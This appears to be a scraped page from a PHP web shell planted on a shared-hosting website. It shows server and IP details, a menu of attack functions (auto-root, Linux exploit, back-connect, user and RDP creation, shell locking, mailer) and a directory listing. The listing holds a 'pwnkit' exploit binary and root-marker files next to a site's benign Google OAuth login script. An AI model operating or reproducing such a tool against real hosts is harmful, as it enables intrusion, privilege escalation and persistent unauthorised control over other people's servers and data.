Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
chatblueversion /
auth /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
google-callback.php
1.81
KB
-rw----r--
google.php
534
B
-rw----r--
pwnkit
0
B
-rwxr-xr-x
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : google.php
<?php require dirname(__DIR__).'/includes/bootstrap.php';if(empty($config['google']['client_id']))exit('Google login is not configured. Add the OAuth credentials in config.php.');$_SESSION['oauth_state']=bin2hex(random_bytes(20));$q=http_build_query(['client_id'=>$config['google']['client_id'],'redirect_uri'=>$config['google']['redirect_uri'],'response_type'=>'code','scope'=>'openid email profile','state'=>$_SESSION['oauth_state'],'prompt'=>'select_account']);header('Location: https://accounts.google.com/o/oauth2/v2/auth?'.$q);
Close